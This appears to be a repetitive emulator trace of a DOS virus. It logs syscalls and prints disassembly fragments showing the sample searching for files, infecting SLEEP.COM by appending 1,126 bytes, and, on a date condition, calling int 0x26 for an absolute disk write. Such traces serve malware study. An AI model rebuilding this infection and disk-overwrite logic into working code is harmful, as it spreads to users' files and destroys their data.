2018-12-25T12:21:18.1241647Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.127680739Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.135177453Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.140018644Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.142855647Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.148967506Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.162141376Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.164668926Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.166964421Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.175767653Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.187412038Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:18.191796073Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.199787734Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.207607147Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.211480879Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.223859687Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.226394727Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.234677549Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.237777287Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.240729935Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.244241067Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.247020116Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.250358039Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.262033194Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.264524047Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.265714389Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.271383524Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.279320747Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:18.281395653Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:18.284844715Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:18.173749779Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:18.176567398Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:18.179797964Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:18.191654681Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:18.192921187Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:18.198045844Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.202724161Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:18.207590822Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:18.209855191Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:18.222630319Z 62 PC: 12cac | Close file
2018-12-25T12:21:18.224850905Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.234761207Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:18.23827597Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.241586027Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.24540749Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:18.24714878Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.249896596Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:18.262428937Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.265253038Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:18.267394058Z 62 PC: 12d11 | Close file
2018-12-25T12:21:18.276889537Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:18.288454797Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:18.29152625Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.29896298Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.307118912Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.310002107Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.321212409Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.324292472Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.332074826Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.335482726Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.339384468Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.341379648Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.342728954Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.344821569Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.35304235Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.356696572Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.363383246Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.372697088Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.385014102Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:18.389336135Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.39748625Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.405874814Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.409372804Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.422034454Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.424655062Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.433857511Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.438029463Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.441741085Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.446350246Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.449041573Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.454678758Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.466225058Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.471348544Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.473490397Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.482412078Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.495272932Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:18.497942015Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:18.502784366Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:18.398728473Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:18.402644155Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:18.407118456Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:18.412396573Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:18.414036543Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:18.428675359Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.43735214Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:18.444860575Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:18.449005878Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:18.461999391Z 62 PC: 12cac | Close file
2018-12-25T12:21:18.464497883Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.469704277Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:18.471785274Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.473776016Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.476200374Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:18.477654536Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.479398169Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:18.486187609Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.489514024Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:18.491683005Z 62 PC: 12d11 | Close file
2018-12-25T12:21:18.501621641Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:18.520820365Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:18.524944069Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.540321249Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.548569283Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.551457013Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.563816671Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.580447925Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.589335923Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.592888355Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.597003065Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.600203264Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.602204877Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.606121239Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.616290391Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.619209534Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.62183225Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.6310396Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.642336836Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:18.645932405Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.654425201Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.661693529Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.664185719Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.676005617Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.678046414Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.685874594Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.68961038Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.692914101Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.696197337Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.699047638Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.702485923Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.71234687Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.715731975Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.717819992Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.727096901Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.739427191Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:18.742335978Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:18.747247987Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:18.613878728Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:18.616864338Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:18.633167434Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:18.638233513Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:18.639746095Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:18.647068011Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.654590644Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:18.661906415Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:18.665631902Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:18.696428991Z 62 PC: 12cac | Close file
2018-12-25T12:21:18.698898742Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.707274066Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:18.710594136Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.714476509Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.729465712Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:18.732100895Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.734993676Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:18.745564637Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.749560116Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:18.752010126Z 62 PC: 12d11 | Close file
2018-12-25T12:21:18.761706597Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:18.793024561Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:18.79645302Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.8060602Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.814775765Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.817728104Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.829635629Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.832309221Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.844559626Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.848028675Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.851681419Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.854591428Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.856587029Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.859300491Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.871560734Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.874823549Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.877064586Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.887471402Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.900334094Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:18.90387408Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.911879861Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.91919045Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.921690856Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.934701205Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.937429624Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.95072215Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.955341634Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.959252582Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.96255209Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.965072759Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.968345014Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.974285969Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.976400963Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.978213369Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.983443904Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.98990527Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:18.99203119Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:18.994638062Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:18.796507254Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:18.800394838Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:18.804090098Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:18.80895564Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:18.810562398Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:18.818039346Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.826338733Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:18.833730961Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:18.8373158Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:18.855033129Z 62 PC: 12cac | Close file
2018-12-25T12:21:18.856975425Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.865211604Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:18.868608431Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.870480559Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.873284919Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:18.874603605Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.876504706Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:18.883490985Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.885346928Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:18.88668953Z 62 PC: 12d11 | Close file
2018-12-25T12:21:18.891731099Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:18.900163209Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:18.902386637Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.907418663Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.912692885Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.921753714Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.933820545Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.937566619Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.945035671Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.948179698Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.951753229Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.954751367Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.956517048Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.959968118Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.970733033Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.977296702Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.979593461Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.989432967Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:19.012700508Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:19.016679029Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:19.025270388Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:19.036517917Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:19.038998248Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:19.052321439Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:19.054857488Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:19.063369308Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:19.067394482Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:19.07074033Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:19.074116205Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:19.076563021Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:19.079463573Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:19.090098289Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:19.094152988Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:19.097028877Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:19.106015977Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:19.118694141Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
